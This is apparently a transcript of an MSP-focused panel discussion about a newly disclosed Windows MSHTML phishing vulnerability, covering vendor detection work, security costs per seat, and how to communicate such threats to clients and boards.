So we're looking for all the artifacts that we know about, and since it is something that's still evolving, we're continuing to try to keep on top of what's new and what other ways we can detect this. Yeah. And John, what about you guys? Yeah, I think the news broke, or maybe the chatter started, around September 17th, or excuse me, September 7th of this month. Yeah. We aren't even at the 17th yet. Goodness, tired.

And I think for a while it was sort of absorbing and understanding what we're seeing on Twitter, as the community and the research industry figure this out. It's kind of weird as a vendor, right? Huntress doing the gut check, doing the sanity check: should we really be screaming about this? Do we need to go chase this ambulance? Is this a really big thing that everyone needs to know about?

And it very rapidly became clear: yeah, this is bad, people need to know. So we started some messaging, right? We started those education fronts, the blog, the Reddit post, the other things we do. We've again tried to validate and recreate the proof of concept, I think similar to what Bryson's team has. We kind of brought to life the .docx, the document file rendition of it, and we have some flashy videos to showcase that popping the calculator.

They're simple proofs of concept, but with that, we can better understand what artifacts are left behind, those indicators of compromise, and really validate some of the detection techniques. Forgive me for whatever shameless thing we tend to do, but we have our monthly show Tradecraft Tuesday, and that's getting started tomorrow.

We'll absolutely be chatting about phishing as an attack vector, and we'll certainly be getting into the nitty-gritty technical details. For folks that want to get nerdy, folks that wanna do some of the geek hackery stuff that we do, we'll be doing that show again tomorrow afternoon. And we'll show those proofs of concept. We'll show the CAB file, the INF file, all of the pieces of the chain here. Yeah.

And definitely pop a link to that in chat so people, if they're not already in Tradecraft Tuesday, can go check that out. And Andrew, super quickly. So the reason I asked that question of both John and Bryson is because if you feel like you can't keep up with this, you probably can't. Just like Gary said, that's the reality.

And so the solution is, just like you outsource many other things, some of your security, not all, hear me, you still own security, but some of your security you're going to have to outsource. And you're gonna have to build a relationship with that third party and say, these are some things I'm expecting you guys to do for me. Is this in scope?

I expect you to notify me. I expect you to be doing some of the threat hunting and research behind the scenes to show me relevance, and even to go back and look and ensure that you're not seeing some of those signs, those indicators of compromise, so to speak. And so that's why I wanted to bring that home, so listeners could hear: even though you may not have done anything, you heard two good vendors here both talk about how much they've done behind the scenes for you.

And I love that the MSP space is finally at this point of maturity. And it's not just these two vendors. There are a whole bunch of other really solid third parties out there that are likewise doing a lot of the same things. And so this is why you do have a managed relationship with security, and why you need to manage it yourself, Andrew. But it's better than that.

Can I just add on? Again, I can't help but go here. I'm listening to what you're saying, Wes, and I'm also getting to see the tools, cost and pricing for 200 MSPs every quarter, right? So I'm seeing in the real world what's going on, and what you just mentioned, when you talk about adding some of that: take a SOC, an MDR, Huntress, a whitelist, all that stuff. That's anywhere from between $10 and $20 a seat.

And that's before, when I do that, at any size MSP, I still have more that I have to do, right? I have to interact with that. I have to have time to communicate with customers. So the moral of the story here is, Andrew, we can talk about all this stuff and everyone can say what they need, but what we just rattled off, and some of the labor around it, is probably a $50 to $60 a seat price change for most MSPs.

And that's what we're gonna have to figure out. That's why we keep going back to the communication and educating your customers, so that they understand it and that won't be an issue. Well, let's come back to that. Maybe even Ryan can talk about this, because you're preaching it to your MSPs, and then Ryan, he sells it to his board.

But one of the questions, Gary, you kind of went ahead, perfect timing, was: what's the best way to communicate these types of vulnerabilities to our clients? He didn't say prospects, but including user education, et cetera. So how are you using this as a wedge? If you could define that, Gary, and, again, the results your clients get.

And then Ryan, I'd love your take on this, because again, you're doing threat modeling and you're figuring out if there are gaps, and you've gotta go sell to your board. So Gary, starting with you. Yeah, so I'll focus on one piece of it. Maybe Ryan could add the second piece. I'll focus on it from a sales conversation with a prospect and a business conversation, like through the vCIO, with the business leaders at your customers.

So they're pretty similar, and they're not the channels for this immediate stuff. I'll maybe let Ryan or someone else talk about how you get out to users the stuff that they need to be aware of from a security standpoint. But from that communication standpoint, every time something happens, it builds the story, so we can continue to talk to customers.

Now, just from the past three or four months, we can rattle off five or six different things and explain to them: let me tell you what's happening. Almost to the point, in a non-technical way, of what John was talking about, which is, hey, the whole threat landscape in less than a year, the exploits, how they're done, what Ryan talked about, about how they're distributed. All of this, every customer and every prospect should understand.

Because once they do, when you talk about changes you're making in roles, in process and tools, it's gonna make sense. And when you do that, the pricing objection: the only reason your customer has a price objection is because they don't understand the stuff we're talking about on here every week the same way that you do. Otherwise, they wouldn't care whether you charge them 2,000 or 2,600. They wouldn't care. Yeah, excellent point. Ryan?

Yeah, maybe Ryan, or someone, about how to get, when this pops up, how to get it communicated out to points of contact or end users, kind of thing. And when... Yeah, I don't feel like I even have a good grasp on how easy it is to share messages like this with SMBs.

I think if you don't have an established vehicle and a cadence for that type of conversation, then trying to use an event like this is actually gonna cause more harm than good. You need to be establishing that as a constant communication medium. And that's important because that's constantly reminding them of the value add that you're providing to them every single day. It shouldn't be "I do this once or twice a year for the really bad ones."

It should be almost like, you know, our MDR provider: I get a weekly intelligence update from them every single week. Last week I was texting Andrew about Cobalt Strike moving up to the number three position in the weekly threat intelligence report in terms of the most-seen threats across all of their customers. And so just that piece of information is interesting, right?

And then this thing comes out and I'm like, ooh, Cobalt Strike, Cobalt Strike. Putting data together, right? And so I think you need to create that vehicle first to have these conversations, and then bringing something like this up is important. Now, this is where you have to kind of straddle the business hat, the security hat and the tech hat, right?

Something like this will scare the crap out of people, and it probably should, but it will take them to a place that you don't want them to go. You need to give them enough information to know that this is a serious event so that you can then educate them: and this is everything we're doing to try to keep you safe.

As more information comes out, we'll continue to act on that and we'll provide you updates. And, as you said, Ryan, here's what we do when we can't keep you safe, through no fault of either of us. Right? Right. I mean, we're all in the same boat right now, even me. There is no mitigation. Right. But I went through and made sure every single one of my systems is reporting into my EDR. I went to my MDR vendor and said, would you be able to detect this?

I've run proofs of concept in my environment to make sure that they actually can detect it. I've done all of the things that I can do to make sure that my defenses are up, right? Shields are up right now, is kind of what I'm saying. And I can't prevent the torpedoes from coming inbound, but I know the engine has enough power to power the shields.

So there are things you do to kind of stave off these attacks. Again, you might get someone that's popped. If someone gets successfully popped by this, it's not game over. You're just now right of boom. And we've talked about how there are a lot of things you can do right of boom; that's home-field advantage, right? They're in your house now, and no one knows your house better than you. So there is a way to have these conversations.

But if you don't have a vehicle for this, I would not encourage you to use this as your starting point. Ryan, Wes, we're losing power now, captain; we can't go on much longer. I wanna add a question. Oh yeah, go ahead. Maybe talk a little bit about this in your upcoming session, because again, I think it falls right in line with your cyber resilience... Yeah, yeah. We should definitely add some commentary around that. Yeah.

And one of the things that I think we're really zoning in on here a little bit, and this is one of the few things I'm actually good at, is that we in security, especially security leaders, have to be interpreters, right? So we're hearing the inputs of all this stuff, right? And no doubt John and Bryson together could run circles and circles and circles around me in their knowledge and depth of understanding of this. That's good. I need that in my life really bad.

But my job, if I'm an MSSP, is to take all those inputs and learn how to translate that into outputs that your decision makers or your clients will understand. And at Perch, we had this saying; we would always say, go get the win. Right? Like, what's the win? Don't leave the win on the table. And so sometimes the win... like Bryson, you just said before the call, you have a huge tropical storm coming in to Houston, right?

Isn't it better to know that you have a tropical storm coming in? No one can stop that storm, but you can be prepared for it and you're aware of what's happening. That kind of confidence is much more important than having no idea that it's happening. And so I think it's our job. There's a fine line between being this boy who cries wolf, right, too many times, to where they're like, oh, I don't care.

But I saw this at the bank: just splicing enough commentary around security with notable events into your regular cadence will move mountains for your budget. I've shared this before on the cyber call, but I'll say it again. I did that over and over in my IT security committee meetings, which my president attended. And all of a sudden, after six months of me having a five-minute story about security, he interrupts me one day and he goes, Wes, stop.

And I'm like, uh, what's about to happen? And he goes, you know, I've always harped about asset quality forever for this bank. He goes, now I'm starting to think cybersecurity is the most important thing for us. And that's all he said. And it just changed everything. And so I just think that's how you do it. And there are mechanisms to get that across.

One of those mechanisms would be: take your vCIO-type people and make sure you're arming them with enough of the message so that when they're talking to their clients, they know what to say. I did that at the bank. I would take branch managers; it's the way I could talk to the whole bank. So I'd take my branch managers, teach them some very key, short snippets of things they need to know, and I'd say, go tell your people. And that's how we make it work.

You just said something that's awesome, and I wanna make sure people don't miss it. And know that I'm good at one thing. Yeah, that was it. Yeah. No, so what you said was, remember, when we're conveying this, there are only a couple of things we're trying to accomplish. One, in some cases we're trying to make them aware of something like this, where, no matter what we say, we can't completely protect them.

So if there's anything they need to do, or we're kind of sharing that risk, we're doing it for a share of risk, or we're doing it to tell them that something has to change: they have to do something different, there's gonna be a price change, a tool, something. Only tell them, was your point, what you need to, in the way you need to, to get to the end result. Anything more, that's where I think you just go into unnecessary FUD.

Gary, I want to... so we've got basically two minutes left. I hope everybody can just hang in there. Gary, quick question to you, and a recommendation, because I've had the good fortune to work with you for five years at one point. And then I want to come to John and then to Bryson to close us out. Bryson and John's is gonna be around what's next, maybe closing comments: what are you guys looking for? What should MSPs be doing?

But Gary, morning huddles: can you talk about the importance, if this got into a small snippet of the cadence, maybe each day? If you have a team, I'm making it up, a team of 10, right, it's somebody's job to monitor Twitter or whatever and bring something up to have a quick conversation. But can you talk about cadence and why it's so critical? Yeah. So setting up cadence in a business, we call it a success rhythm. Every team should have a huddle, and that's daily.

You have weekly meetings, monthly meetings. If you read the book Traction, or you read Scaling Up, you can quickly implement it. But this is one of the reasons why: it's not just that they're accountable for metrics, but we need a heartbeat to be able to communicate things that are important. Somebody responsible for knowing what's important, and somebody communicating it.

And I think what you just said, Andrew, is really how they're gonna kind of raise that security poverty level within the organization. And that's gonna go a long way, besides these more formal communications that we're talking about. So with that, I'll just do my wrap-up. Bryson and John, thank you so much.

I know we kind of riffed here at the end trying to sum everything up, but we couldn't do that without all the awesome technical information that you guys brought about this. And you're doing great things for the community. Thanks. Thanks. Yeah, absolutely. John, so closing for you: what's on the agenda for you guys, in maybe 60 seconds? If you could kind of close us out, what are you guys looking at? What can MSPs do? Give us your take, and then Bryson. Okay.

We're still keeping our ears to the ground. We're still doing the research, we're still doing the dirty-work analysis: what other things might come from this sort of vulnerability? I think if we were to try and glimpse into the future, and again, I don't have a crystal ball, I'm not Nostradamus, I don't know.

But I think what this could open the door for are more tricks, more something up the hacker's sleeve as to how they could very well be abusing MSHTML. The weird risk in this is that it's gonna end up being code executed from the browser, and that means it starts to bleed into that buzzword of fileless malware. But it really means it, and that's traditionally much harder to detect, much harder to track down and much harder to find.

It might leave some breadcrumbs, but the onus is on us, on you, on me, on all of us to really go look for it and hunt it down. Yeah. Great way to sum it up. Bryson... first, John, thank you so much for coming. Bryson, to you for closing us out.

I think it's interesting that this year we've seen so many Microsoft vulnerabilities in what you might consider legacy software, on-premises Exchange, while Microsoft seems to be more focused on cloud-hosted stuff. The on-premises stuff, maybe not exactly legacy, but it's a little bit older code base; it's not as much of a focus for Microsoft. We've got printer drivers that have been vulnerable for 3, 4, 5 years.

And then this is essentially left over from Internet Explorer. I think we need to start thinking about what other aspects of Windows have been around for a long time and maybe haven't been reviewed. And I think we're gonna see some more of that. So I don't think we're done seeing these major Windows vulnerabilities, and it's gonna be interesting to see what comes out next. Thank you for summing it up. Ryan?

Wes, it sounds like the technical debt isn't just with the small vendors out there. It's the big guys too. We all have it, and every industry's got it, that's for sure. Yeah. So with that, everybody: Ryan, Wes again, Bryson and John, thanks a million. You guys all out there from the cyber call audience, thank you so much for joining. We'll look forward to seeing you next week. Take care. Thanks.